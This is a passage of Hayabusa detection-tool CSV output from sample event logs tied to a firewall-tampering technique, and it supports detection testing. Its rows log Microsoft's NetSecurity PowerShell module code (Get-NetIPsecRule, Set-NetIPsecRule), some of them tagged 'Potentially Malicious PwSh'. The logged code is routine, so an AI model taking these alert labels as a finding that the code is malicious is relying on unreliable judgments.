'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecRule' -Alias '*' function Set-NetIPsecRule { 
[CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByIPsecRuleName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 
[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] 
${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${User}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Machine}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 
[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,")] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if 
($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { 
[object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolic",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,")] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 